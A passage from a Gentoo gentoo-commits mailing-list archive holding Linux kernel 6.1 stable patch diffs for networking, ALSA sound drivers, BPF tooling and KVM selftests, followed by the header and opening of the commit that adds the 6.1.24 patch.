++	    !test_and_set_bit(MPTCP_WORK_CLOSE_SUBFLOW, &msk->flags))
++		mptcp_schedule_work((struct sock *)msk);
+ }
+ 
+ static bool subflow_can_fallback(struct mptcp_subflow_context *subflow)
+diff --git a/net/openvswitch/actions.c b/net/openvswitch/actions.c
+index ca3ebfdb30231..a8cf9a88758ef 100644
+--- a/net/openvswitch/actions.c
++++ b/net/openvswitch/actions.c
+@@ -913,7 +913,7 @@ static void do_output(struct datapath *dp, struct sk_buff *skb, int out_port,
+ {
+ 	struct vport *vport = ovs_vport_rcu(dp, out_port);
+ 
+-	if (likely(vport)) {
++	if (likely(vport && netif_carrier_ok(vport->dev))) {
+ 		u16 mru = OVS_CB(skb)->mru;
+ 		u32 cutlen = OVS_CB(skb)->cutlen;
+ 
+diff --git a/net/qrtr/af_qrtr.c b/net/qrtr/af_qrtr.c
+index 3a70255c8d02f..76f0434d3d06a 100644
+--- a/net/qrtr/af_qrtr.c
++++ b/net/qrtr/af_qrtr.c
+@@ -498,6 +498,11 @@ int qrtr_endpoint_post(struct qrtr_endpoint *ep, const void *data, size_t len)
+ 	if (!size || len != ALIGN(size, 4) + hdrlen)
+ 		goto err;
+ 
++	if ((cb->type == QRTR_TYPE_NEW_SERVER ||
++	     cb->type == QRTR_TYPE_RESUME_TX) &&
++	    size < sizeof(struct qrtr_ctrl_pkt))
++		goto err;
++
+ 	if (cb->dst_port != QRTR_PORT_CTRL && cb->type != QRTR_TYPE_DATA &&
+ 	    cb->type != QRTR_TYPE_RESUME_TX)
+ 		goto err;
+@@ -510,9 +515,6 @@ int qrtr_endpoint_post(struct qrtr_endpoint *ep, const void *data, size_t len)
+ 		/* Remote node endpoint can bridge other distant nodes */
+ 		const struct qrtr_ctrl_pkt *pkt;
+ 
+-		if (size < sizeof(*pkt))
+-			goto err;
+-
+ 		pkt = data + hdrlen;
+ 		qrtr_node_assign(node, le32_to_cpu(pkt->server.node));
+ 	}
+diff --git a/net/sctp/stream_interleave.c b/net/sctp/stream_interleave.c
+index bb22b71df7a34..4fbd6d0529545 100644
+--- a/net/sctp/stream_interleave.c
++++ b/net/sctp/stream_interleave.c
+@@ -1160,7 +1160,8 @@ static void sctp_generate_iftsn(struct sctp_outq *q, __u32 ctsn)
+ 
+ #define _sctp_walk_ifwdtsn(pos, chunk, end) \
+ 	for (pos = chunk->subh.ifwdtsn_hdr->skip; \
+-	     (void *)pos < (void *)chunk->subh.ifwdtsn_hdr->skip + (end); pos++)
++	     (void *)pos <= (void *)chunk->subh.ifwdtsn_hdr->skip + (end) - \
++			    sizeof(struct sctp_ifwdtsn_skip); pos++)
+ 
+ #define sctp_walk_ifwdtsn(pos, ch) \
+ 	_sctp_walk_ifwdtsn((pos), (ch), ntohs((ch)->chunk_hdr->length) - \
+diff --git a/sound/firewire/tascam/tascam-stream.c b/sound/firewire/tascam/tascam-stream.c
+index 53e094cc411f8..dfe783d01d7d2 100644
+--- a/sound/firewire/tascam/tascam-stream.c
++++ b/sound/firewire/tascam/tascam-stream.c
+@@ -490,7 +490,7 @@ int snd_tscm_stream_start_duplex(struct snd_tscm *tscm, unsigned int rate)
+ 		// packet is important for media clock recovery.
+ 		err = amdtp_domain_start(&tscm->domain, tx_init_skip_cycles, true, true);
+ 		if (err < 0)
+-			return err;
++			goto error;
+ 
+ 		if (!amdtp_domain_wait_ready(&tscm->domain, READY_TIMEOUT_MS)) {
+ 			err = -ETIMEDOUT;
+diff --git a/sound/i2c/cs8427.c b/sound/i2c/cs8427.c
+index 65012af6a36e4..f58b14b490455 100644
+--- a/sound/i2c/cs8427.c
++++ b/sound/i2c/cs8427.c
+@@ -561,10 +561,13 @@ int snd_cs8427_iec958_active(struct snd_i2c_device *cs8427, int active)
+ 	if (snd_BUG_ON(!cs8427))
+ 		return -ENXIO;
+ 	chip = cs8427->private_data;
+-	if (active)
++	if (active) {
+ 		memcpy(chip->playback.pcm_status,
+ 		       chip->playback.def_status, 24);
+-	chip->playback.pcm_ctl->vd[0].access &= ~SNDRV_CTL_ELEM_ACCESS_INACTIVE;
++		chip->playback.pcm_ctl->vd[0].access &= ~SNDRV_CTL_ELEM_ACCESS_INACTIVE;
++	} else {
++		chip->playback.pcm_ctl->vd[0].access |= SNDRV_CTL_ELEM_ACCESS_INACTIVE;
++	}
+ 	snd_ctl_notify(cs8427->bus->card,
+ 		       SNDRV_CTL_EVENT_MASK_VALUE | SNDRV_CTL_EVENT_MASK_INFO,
+ 		       &chip->playback.pcm_ctl->id);
+diff --git a/sound/pci/emu10k1/emupcm.c b/sound/pci/emu10k1/emupcm.c
+index 48af77ae8020f..6ec394fb18468 100644
+--- a/sound/pci/emu10k1/emupcm.c
++++ b/sound/pci/emu10k1/emupcm.c
+@@ -1236,7 +1236,7 @@ static int snd_emu10k1_capture_mic_close(struct snd_pcm_substream *substream)
+ {
+ 	struct snd_emu10k1 *emu = snd_pcm_substream_chip(substream);
+ 
+-	emu->capture_interrupt = NULL;
++	emu->capture_mic_interrupt = NULL;
+ 	emu->pcm_capture_mic_substream = NULL;
+ 	return 0;
+ }
+@@ -1344,7 +1344,7 @@ static int snd_emu10k1_capture_efx_close(struct snd_pcm_substream *substream)
+ {
+ 	struct snd_emu10k1 *emu = snd_pcm_substream_chip(substream);
+ 
+-	emu->capture_interrupt = NULL;
++	emu->capture_efx_interrupt = NULL;
+ 	emu->pcm_capture_efx_substream = NULL;
+ 	return 0;
+ }
+@@ -1781,17 +1781,21 @@ int snd_emu10k1_pcm_efx(struct snd_emu10k1 *emu, int device)
+ 	struct snd_kcontrol *kctl;
+ 	int err;
+ 
+-	err = snd_pcm_new(emu->card, "emu10k1 efx", device, 8, 1, &pcm);
++	err = snd_pcm_new(emu->card, "emu10k1 efx", device, emu->audigy ? 0 : 8, 1, &pcm);
+ 	if (err < 0)
+ 		return err;
+ 
+ 	pcm->private_data = emu;
+ 
+-	snd_pcm_set_ops(pcm, SNDRV_PCM_STREAM_PLAYBACK, &snd_emu10k1_fx8010_playback_ops);
++	if (!emu->audigy)
++		snd_pcm_set_ops(pcm, SNDRV_PCM_STREAM_PLAYBACK, &snd_emu10k1_fx8010_playback_ops);
+ 	snd_pcm_set_ops(pcm, SNDRV_PCM_STREAM_CAPTURE, &snd_emu10k1_capture_efx_ops);
+ 
+ 	pcm->info_flags = 0;
+-	strcpy(pcm->name, "Multichannel Capture/PT Playback");
++	if (emu->audigy)
++		strcpy(pcm->name, "Multichannel Capture");
++	else
++		strcpy(pcm->name, "Multichannel Capture/PT Playback");
+ 	emu->pcm_efx = pcm;
+ 
+ 	/* EFX capture - record the "FXBUS2" channels, by default we connect the EXTINs 
+diff --git a/sound/pci/hda/patch_hdmi.c b/sound/pci/hda/patch_hdmi.c
+index 4ffa3a59f419f..5c6980394dcec 100644
+--- a/sound/pci/hda/patch_hdmi.c
++++ b/sound/pci/hda/patch_hdmi.c
+@@ -4604,7 +4604,7 @@ HDA_CODEC_ENTRY(0x80862814, "DG1 HDMI",	patch_i915_tgl_hdmi),
+ HDA_CODEC_ENTRY(0x80862815, "Alderlake HDMI",	patch_i915_tgl_hdmi),
+ HDA_CODEC_ENTRY(0x80862816, "Rocketlake HDMI",	patch_i915_tgl_hdmi),
+ HDA_CODEC_ENTRY(0x80862818, "Raptorlake HDMI",	patch_i915_tgl_hdmi),
+-HDA_CODEC_ENTRY(0x80862819, "DG2 HDMI",	patch_i915_adlp_hdmi),
++HDA_CODEC_ENTRY(0x80862819, "DG2 HDMI",	patch_i915_tgl_hdmi),
+ HDA_CODEC_ENTRY(0x8086281a, "Jasperlake HDMI",	patch_i915_icl_hdmi),
+ HDA_CODEC_ENTRY(0x8086281b, "Elkhartlake HDMI",	patch_i915_icl_hdmi),
+ HDA_CODEC_ENTRY(0x8086281c, "Alderlake-P HDMI", patch_i915_adlp_hdmi),
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 50b8573b52066..6a6c72b5ea26d 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -6960,6 +6960,8 @@ enum {
+ 	ALC269_FIXUP_DELL_M101Z,
+ 	ALC269_FIXUP_SKU_IGNORE,
+ 	ALC269_FIXUP_ASUS_G73JW,
++	ALC269_FIXUP_ASUS_N7601ZM_PINS,
++	ALC269_FIXUP_ASUS_N7601ZM,
+ 	ALC269_FIXUP_LENOVO_EAPD,
+ 	ALC275_FIXUP_SONY_HWEQ,
+ 	ALC275_FIXUP_SONY_DISABLE_AAMIX,
+@@ -7256,6 +7258,29 @@ static const struct hda_fixup alc269_fixups[] = {
+ 			{ }
+ 		}
+ 	},
++	[ALC269_FIXUP_ASUS_N7601ZM_PINS] = {
++		.type = HDA_FIXUP_PINS,
++		.v.pins = (const struct hda_pintbl[]) {
++			{ 0x19, 0x03A11050 },
++			{ 0x1a, 0x03A11C30 },
++			{ 0x21, 0x03211420 },
++			{ }
++		}
++	},
++	[ALC269_FIXUP_ASUS_N7601ZM] = {
++		.type = HDA_FIXUP_VERBS,
++		.v.verbs = (const struct hda_verb[]) {
++			{0x20, AC_VERB_SET_COEF_INDEX, 0x62},
++			{0x20, AC_VERB_SET_PROC_COEF, 0xa007},
++			{0x20, AC_VERB_SET_COEF_INDEX, 0x10},
++			{0x20, AC_VERB_SET_PROC_COEF, 0x8420},
++			{0x20, AC_VERB_SET_COEF_INDEX, 0x0f},
++			{0x20, AC_VERB_SET_PROC_COEF, 0x7774},
++			{ }
++		},
++		.chained = true,
++		.chain_id = ALC269_FIXUP_ASUS_N7601ZM_PINS,
++	},
+ 	[ALC269_FIXUP_LENOVO_EAPD] = {
+ 		.type = HDA_FIXUP_VERBS,
+ 		.v.verbs = (const struct hda_verb[]) {
+@@ -9465,6 +9490,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1043, 0x1271, "ASUS X430UN", ALC256_FIXUP_ASUS_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1043, 0x1290, "ASUS X441SA", ALC233_FIXUP_EAPD_COEF_AND_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1043, 0x12a0, "ASUS X441UV", ALC233_FIXUP_EAPD_COEF_AND_MIC_NO_PRESENCE),
++	SND_PCI_QUIRK(0x1043, 0x12a3, "Asus N7691ZM", ALC269_FIXUP_ASUS_N7601ZM),
+ 	SND_PCI_QUIRK(0x1043, 0x12af, "ASUS UX582ZS", ALC245_FIXUP_CS35L41_SPI_2),
+ 	SND_PCI_QUIRK(0x1043, 0x12e0, "ASUS X541SA", ALC256_FIXUP_ASUS_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x12f0, "ASUS X541UV", ALC256_FIXUP_ASUS_MIC),
+@@ -9662,6 +9688,9 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x17aa, 0x22f1, "Thinkpad", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x17aa, 0x22f2, "Thinkpad", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x17aa, 0x22f3, "Thinkpad", ALC287_FIXUP_CS35L41_I2C_2),
++	SND_PCI_QUIRK(0x17aa, 0x2318, "Thinkpad Z13 Gen2", ALC287_FIXUP_CS35L41_I2C_2),
++	SND_PCI_QUIRK(0x17aa, 0x2319, "Thinkpad Z16 Gen2", ALC287_FIXUP_CS35L41_I2C_2),
++	SND_PCI_QUIRK(0x17aa, 0x231a, "Thinkpad Z16 Gen2", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x17aa, 0x30bb, "ThinkCentre AIO", ALC233_FIXUP_LENOVO_LINE2_MIC_HOTKEY),
+ 	SND_PCI_QUIRK(0x17aa, 0x30e2, "ThinkCentre AIO", ALC233_FIXUP_LENOVO_LINE2_MIC_HOTKEY),
+ 	SND_PCI_QUIRK(0x17aa, 0x310c, "ThinkCentre Station", ALC294_FIXUP_LENOVO_MIC_LOCATION),
+diff --git a/sound/pci/hda/patch_sigmatel.c b/sound/pci/hda/patch_sigmatel.c
+index a794a01a68ca6..61258b0aac8d6 100644
+--- a/sound/pci/hda/patch_sigmatel.c
++++ b/sound/pci/hda/patch_sigmatel.c
+@@ -1707,6 +1707,7 @@ static const struct snd_pci_quirk stac925x_fixup_tbl[] = {
+ };
+ 
+ static const struct hda_pintbl ref92hd73xx_pin_configs[] = {
++	// Port A-H
+ 	{ 0x0a, 0x02214030 },
+ 	{ 0x0b, 0x02a19040 },
+ 	{ 0x0c, 0x01a19020 },
+@@ -1715,9 +1716,12 @@ static const struct hda_pintbl ref92hd73xx_pin_configs[] = {
+ 	{ 0x0f, 0x01014010 },
+ 	{ 0x10, 0x01014020 },
+ 	{ 0x11, 0x01014030 },
++	// CD in
+ 	{ 0x12, 0x02319040 },
++	// Digial Mic ins
+ 	{ 0x13, 0x90a000f0 },
+ 	{ 0x14, 0x90a000f0 },
++	// Digital outs
+ 	{ 0x22, 0x01452050 },
+ 	{ 0x23, 0x01452050 },
+ 	{}
+@@ -1758,6 +1762,7 @@ static const struct hda_pintbl alienware_m17x_pin_configs[] = {
+ };
+ 
+ static const struct hda_pintbl intel_dg45id_pin_configs[] = {
++	// Analog outputs
+ 	{ 0x0a, 0x02214230 },
+ 	{ 0x0b, 0x02A19240 },
+ 	{ 0x0c, 0x01013214 },
+@@ -1765,6 +1770,9 @@ static const struct hda_pintbl intel_dg45id_pin_configs[] = {
+ 	{ 0x0e, 0x01A19250 },
+ 	{ 0x0f, 0x01011212 },
+ 	{ 0x10, 0x01016211 },
++	// Digital output
++	{ 0x22, 0x01451380 },
++	{ 0x23, 0x40f000f0 },
+ 	{}
+ };
+ 
+@@ -1955,6 +1963,8 @@ static const struct snd_pci_quirk stac92hd73xx_fixup_tbl[] = {
+ 				"DFI LanParty", STAC_92HD73XX_REF),
+ 	SND_PCI_QUIRK(PCI_VENDOR_ID_DFI, 0x3101,
+ 				"DFI LanParty", STAC_92HD73XX_REF),
++	SND_PCI_QUIRK(PCI_VENDOR_ID_INTEL, 0x5001,
++				"Intel DP45SG", STAC_92HD73XX_INTEL),
+ 	SND_PCI_QUIRK(PCI_VENDOR_ID_INTEL, 0x5002,
+ 				"Intel DG45ID", STAC_92HD73XX_INTEL),
+ 	SND_PCI_QUIRK(PCI_VENDOR_ID_INTEL, 0x5003,
+diff --git a/tools/lib/bpf/btf_dump.c b/tools/lib/bpf/btf_dump.c
+index 80a15a6802094..4cd1d49c94d6d 100644
+--- a/tools/lib/bpf/btf_dump.c
++++ b/tools/lib/bpf/btf_dump.c
+@@ -1015,9 +1015,12 @@ static void btf_dump_emit_struct_def(struct btf_dump *d,
+ 	 * Keep `struct empty {}` on a single line,
+ 	 * only print newline when there are regular or padding fields.
+ 	 */
+-	if (vlen || t->size)
++	if (vlen || t->size) {
+ 		btf_dump_printf(d, "\n");
+-	btf_dump_printf(d, "%s}", pfx(lvl));
++		btf_dump_printf(d, "%s}", pfx(lvl));
++	} else {
++		btf_dump_printf(d, "}");
++	}
+ 	if (packed)
+ 		btf_dump_printf(d, " __attribute__((packed))");
+ }
+diff --git a/tools/testing/radix-tree/maple.c b/tools/testing/radix-tree/maple.c
+index aceb6011315c2..18e319e6ce335 100644
+--- a/tools/testing/radix-tree/maple.c
++++ b/tools/testing/radix-tree/maple.c
+@@ -107,6 +107,7 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 	MT_BUG_ON(mt, mn->slot[1] != NULL);
+ 	MT_BUG_ON(mt, mas_allocated(&mas) != 0);
+ 
++	mn->parent = ma_parent_ptr(mn);
+ 	ma_free_rcu(mn);
+ 	mas.node = MAS_START;
+ 	mas_nomem(&mas, GFP_KERNEL);
+@@ -159,6 +160,7 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 		MT_BUG_ON(mt, mas_allocated(&mas) != i);
+ 		MT_BUG_ON(mt, !mn);
+ 		MT_BUG_ON(mt, not_empty(mn));
++		mn->parent = ma_parent_ptr(mn);
+ 		ma_free_rcu(mn);
+ 	}
+ 
+@@ -191,6 +193,7 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 		MT_BUG_ON(mt, not_empty(mn));
+ 		MT_BUG_ON(mt, mas_allocated(&mas) != i - 1);
+ 		MT_BUG_ON(mt, !mn);
++		mn->parent = ma_parent_ptr(mn);
+ 		ma_free_rcu(mn);
+ 	}
+ 
+@@ -209,6 +212,7 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 			mn = mas_pop_node(&mas);
+ 			MT_BUG_ON(mt, not_empty(mn));
+ 			MT_BUG_ON(mt, mas_allocated(&mas) != j - 1);
++			mn->parent = ma_parent_ptr(mn);
+ 			ma_free_rcu(mn);
+ 		}
+ 		MT_BUG_ON(mt, mas_allocated(&mas) != 0);
+@@ -232,6 +236,7 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 			MT_BUG_ON(mt, mas_allocated(&mas) != i - j);
+ 			mn = mas_pop_node(&mas);
+ 			MT_BUG_ON(mt, not_empty(mn));
++			mn->parent = ma_parent_ptr(mn);
+ 			ma_free_rcu(mn);
+ 			MT_BUG_ON(mt, mas_allocated(&mas) != i - j - 1);
+ 		}
+@@ -268,6 +273,7 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 			mn = mas_pop_node(&mas); /* get the next node. */
+ 			MT_BUG_ON(mt, mn == NULL);
+ 			MT_BUG_ON(mt, not_empty(mn));
++			mn->parent = ma_parent_ptr(mn);
+ 			ma_free_rcu(mn);
+ 		}
+ 		MT_BUG_ON(mt, mas_allocated(&mas) != 0);
+@@ -293,6 +299,7 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 			mn = mas_pop_node(&mas2); /* get the next node. */
+ 			MT_BUG_ON(mt, mn == NULL);
+ 			MT_BUG_ON(mt, not_empty(mn));
++			mn->parent = ma_parent_ptr(mn);
+ 			ma_free_rcu(mn);
+ 		}
+ 		MT_BUG_ON(mt, mas_allocated(&mas2) != 0);
+@@ -333,10 +340,12 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 	MT_BUG_ON(mt, mas_allocated(&mas) != MAPLE_ALLOC_SLOTS + 2);
+ 	mn = mas_pop_node(&mas);
+ 	MT_BUG_ON(mt, not_empty(mn));
++	mn->parent = ma_parent_ptr(mn);
+ 	ma_free_rcu(mn);
+ 	for (i = 1; i <= MAPLE_ALLOC_SLOTS + 1; i++) {
+ 		mn = mas_pop_node(&mas);
+ 		MT_BUG_ON(mt, not_empty(mn));
++		mn->parent = ma_parent_ptr(mn);
+ 		ma_free_rcu(mn);
+ 	}
+ 	MT_BUG_ON(mt, mas_allocated(&mas) != 0);
+@@ -374,6 +383,7 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 		mas_node_count(&mas, i); /* Request */
+ 		mas_nomem(&mas, GFP_KERNEL); /* Fill request */
+ 		mn = mas_pop_node(&mas); /* get the next node. */
++		mn->parent = ma_parent_ptr(mn);
+ 		ma_free_rcu(mn);
+ 		mas_destroy(&mas);
+ 
+@@ -381,10 +391,13 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 		mas_node_count(&mas, i); /* Request */
+ 		mas_nomem(&mas, GFP_KERNEL); /* Fill request */
+ 		mn = mas_pop_node(&mas); /* get the next node. */
++		mn->parent = ma_parent_ptr(mn);
+ 		ma_free_rcu(mn);
+ 		mn = mas_pop_node(&mas); /* get the next node. */
++		mn->parent = ma_parent_ptr(mn);
+ 		ma_free_rcu(mn);
+ 		mn = mas_pop_node(&mas); /* get the next node. */
++		mn->parent = ma_parent_ptr(mn);
+ 		ma_free_rcu(mn);
+ 		mas_destroy(&mas);
+ 	}
+@@ -35368,6 +35381,7 @@ static noinline void check_prealloc(struct maple_tree *mt)
+ 	MT_BUG_ON(mt, allocated != 1 + height * 3);
+ 	mn = mas_pop_node(&mas);
+ 	MT_BUG_ON(mt, mas_allocated(&mas) != allocated - 1);
++	mn->parent = ma_parent_ptr(mn);
+ 	ma_free_rcu(mn);
+ 	MT_BUG_ON(mt, mas_preallocate(&mas, ptr, GFP_KERNEL) != 0);
+ 	mas_destroy(&mas);
+@@ -35385,6 +35399,7 @@ static noinline void check_prealloc(struct maple_tree *mt)
+ 	mas_destroy(&mas);
+ 	allocated = mas_allocated(&mas);
+ 	MT_BUG_ON(mt, allocated != 0);
++	mn->parent = ma_parent_ptr(mn);
+ 	ma_free_rcu(mn);
+ 
+ 	MT_BUG_ON(mt, mas_preallocate(&mas, ptr, GFP_KERNEL) != 0);
+@@ -35755,6 +35770,7 @@ void farmer_tests(void)
+ 	tree.ma_root = mt_mk_node(node, maple_leaf_64);
+ 	mt_dump(&tree);
+ 
++	node->parent = ma_parent_ptr(node);
+ 	ma_free_rcu(node);
+ 
+ 	/* Check things that will make lockdep angry */
+diff --git a/tools/testing/selftests/bpf/progs/find_vma_fail1.c b/tools/testing/selftests/bpf/progs/find_vma_fail1.c
+index b3b326b8e2d1c..6dab9cffda132 100644
+--- a/tools/testing/selftests/bpf/progs/find_vma_fail1.c
++++ b/tools/testing/selftests/bpf/progs/find_vma_fail1.c
+@@ -2,6 +2,7 @@
+ /* Copyright (c) 2021 Facebook */
+ #include "vmlinux.h"
+ #include <bpf/bpf_helpers.h>
++#define vm_flags vm_start
+ 
+ char _license[] SEC("license") = "GPL";
+ 
+diff --git a/tools/testing/selftests/kvm/include/x86_64/svm.h b/tools/testing/selftests/kvm/include/x86_64/svm.h
+index c8343ff84f7f7..483e6ae12f69e 100644
+--- a/tools/testing/selftests/kvm/include/x86_64/svm.h
++++ b/tools/testing/selftests/kvm/include/x86_64/svm.h
+@@ -58,6 +58,23 @@ enum {
+ 	INTERCEPT_RDPRU,
+ };
+ 
++struct hv_vmcb_enlightenments {
++	struct __packed hv_enlightenments_control {
++		u32 nested_flush_hypercall:1;
++		u32 msr_bitmap:1;
++		u32 enlightened_npt_tlb: 1;
++		u32 reserved:29;
++	} __packed hv_enlightenments_control;
++	u32 hv_vp_id;
++	u64 hv_vm_id;
++	u64 partition_assist_page;
++	u64 reserved;
++} __packed;
++
++/*
++ * Hyper-V uses the software reserved clean bit in VMCB
++ */
++#define HV_VMCB_NESTED_ENLIGHTENMENTS (1U << 31)
+ 
+ struct __attribute__ ((__packed__)) vmcb_control_area {
+ 	u32 intercept_cr;
+@@ -106,7 +123,10 @@ struct __attribute__ ((__packed__)) vmcb_control_area {
+ 	 * Offset 0x3e0, 32 bytes reserved
+ 	 * for use by hypervisor/software.
+ 	 */
+-	u8 reserved_sw[32];
++	union {
++		struct hv_vmcb_enlightenments hv_enlightenments;
++		u8 reserved_sw[32];
++	};
+ };
+ 
+ 
+diff --git a/tools/testing/selftests/kvm/x86_64/hyperv_svm_test.c b/tools/testing/selftests/kvm/x86_64/hyperv_svm_test.c
+index a380ad7bb9b34..1c3fc38b4f151 100644
+--- a/tools/testing/selftests/kvm/x86_64/hyperv_svm_test.c
++++ b/tools/testing/selftests/kvm/x86_64/hyperv_svm_test.c
+@@ -23,24 +23,6 @@
+ 
+ #define L2_GUEST_STACK_SIZE 256
+ 
+-struct hv_enlightenments {
+-	struct __packed hv_enlightenments_control {
+-		u32 nested_flush_hypercall:1;
+-		u32 msr_bitmap:1;
+-		u32 enlightened_npt_tlb: 1;
+-		u32 reserved:29;
+-	} __packed hv_enlightenments_control;
+-	u32 hv_vp_id;
+-	u64 hv_vm_id;
+-	u64 partition_assist_page;
+-	u64 reserved;
+-} __packed;
+-
+-/*
+- * Hyper-V uses the software reserved clean bit in VMCB
+- */
+-#define VMCB_HV_NESTED_ENLIGHTENMENTS (1U << 31)
+-
+ void l2_guest_code(void)
+ {
+ 	GUEST_SYNC(3);
+@@ -64,8 +46,7 @@ static void __attribute__((__flatten__)) guest_code(struct svm_test_data *svm)
+ {
+ 	unsigned long l2_guest_stack[L2_GUEST_STACK_SIZE];
+ 	struct vmcb *vmcb = svm->vmcb;
+-	struct hv_enlightenments *hve =
+-		(struct hv_enlightenments *)vmcb->control.reserved_sw;
++	struct hv_vmcb_enlightenments *hve = &vmcb->control.hv_enlightenments;
+ 
+ 	GUEST_SYNC(1);
+ 
+@@ -98,14 +79,14 @@ static void __attribute__((__flatten__)) guest_code(struct svm_test_data *svm)
+ 	/* Intercept RDMSR 0xc0000101 without telling KVM about it */
+ 	set_bit(2 * (MSR_GS_BASE & 0x1fff), svm->msr + 0x800);
+ 	/* Make sure HV_VMX_ENLIGHTENED_CLEAN_FIELD_MSR_BITMAP is set */
+-	vmcb->control.clean |= VMCB_HV_NESTED_ENLIGHTENMENTS;
++	vmcb->control.clean |= HV_VMCB_NESTED_ENLIGHTENMENTS;
+ 	run_guest(vmcb, svm->vmcb_gpa);
+ 	/* Make sure we don't see SVM_EXIT_MSR here so eMSR bitmap works */
+ 	GUEST_ASSERT(vmcb->control.exit_code == SVM_EXIT_VMMCALL);
+ 	vmcb->save.rip += 3; /* vmcall */
+ 
+ 	/* Now tell KVM we've changed MSR-Bitmap */
+-	vmcb->control.clean &= ~VMCB_HV_NESTED_ENLIGHTENMENTS;
++	vmcb->control.clean &= ~HV_VMCB_NESTED_ENLIGHTENMENTS;
+ 	run_guest(vmcb, svm->vmcb_gpa);
+ 	GUEST_ASSERT(vmcb->control.exit_code == SVM_EXIT_MSR);
+ 	vmcb->save.rip += 2; /* rdmsr */
+diff --git a/tools/testing/selftests/net/openvswitch/ovs-dpctl.py b/tools/testing/selftests/net/openvswitch/ovs-dpctl.py
+index 3243c90d449e6..5d467d1993cb1 100644
+--- a/tools/testing/selftests/net/openvswitch/ovs-dpctl.py
++++ b/tools/testing/selftests/net/openvswitch/ovs-dpctl.py
+@@ -62,7 +62,7 @@ class OvsDatapath(GenericNetlinkSocket):
+         nla_map = (
+             ("OVS_DP_ATTR_UNSPEC", "none"),
+             ("OVS_DP_ATTR_NAME", "asciiz"),
+-            ("OVS_DP_ATTR_UPCALL_PID", "uint32"),
++            ("OVS_DP_ATTR_UPCALL_PID", "array(uint32)"),
+             ("OVS_DP_ATTR_STATS", "dpstats"),
+             ("OVS_DP_ATTR_MEGAFLOW_STATS", "megaflowstats"),
+             ("OVS_DP_ATTR_USER_FEATURES", "uint32"),


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-04-13 16:09 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-04-13 16:09 UTC (permalink / raw
  To: gentoo-commits

commit:     ca7e265c42f5d0ef307cd4e76877fd77b86dae6c
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Apr 13 16:09:19 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Apr 13 16:09:19 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=ca7e265c

Linux patch 6.1.24

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |     4 +
 1023_linux-6.1.24.patch | 14535 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 14539 insertions(+)

diff --git a/0000_README b/0000_README
index 82189ada..ef975a1f 100644
--- a/0000_README
+++ b/0000_README
@@ -135,6 +135,10 @@ Patch:  1022_linux-6.1.23.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.23
 
+Patch:  1023_linux-6.1.24.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.24
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1023_linux-6.1.24.patch b/1023_linux-6.1.24.patch
new file mode 100644
index 00000000..546adf85
--- /dev/null
+++ b/1023_linux-6.1.24.patch
@@ -0,0 +1,14535 @@
+diff --git a/Documentation/devicetree/bindings/serial/renesas,scif.yaml b/Documentation/devicetree/bindings/serial/renesas,scif.yaml
+index f930e7f1349fc..52c0948738637 100644
+--- a/Documentation/devicetree/bindings/serial/renesas,scif.yaml
++++ b/Documentation/devicetree/bindings/serial/renesas,scif.yaml
+@@ -91,7 +91,7 @@ properties:
+           - description: Error interrupt
+           - description: Receive buffer full interrupt
+           - description: Transmit buffer empty interrupt
+-          - description: Transmit End interrupt
++          - description: Break interrupt
+       - items:
+           - description: Error interrupt
+           - description: Receive buffer full interrupt
+@@ -106,7 +106,7 @@ properties:
+           - const: eri
+           - const: rxi
+           - const: txi
+-          - const: tei
++          - const: bri
+       - items:
+           - const: eri
+           - const: rxi
+diff --git a/Documentation/mm/zsmalloc.rst b/Documentation/mm/zsmalloc.rst
+index 6e79893d61326..d98607aa9c1fd 100644
+--- a/Documentation/mm/zsmalloc.rst
++++ b/Documentation/mm/zsmalloc.rst
+@@ -68,6 +68,8 @@ pages_used
+ 	the number of pages allocated for the class
+ pages_per_zspage
+ 	the number of 0-order pages to make a zspage
++freeable
++	the approximate number of pages class compaction can free
+ 
+ We assign a zspage to ZS_ALMOST_EMPTY fullness group when n <= N / f, where
+ 
+diff --git a/Makefile b/Makefile
+index a162f6cdf77c6..4f9939dec2c26 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 23
++SUBLEVEL = 24
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/arm64/kernel/compat_alignment.c b/arch/arm64/kernel/compat_alignment.c
+index 5edec2f49ec98..deff21bfa6800 100644
+--- a/arch/arm64/kernel/compat_alignment.c
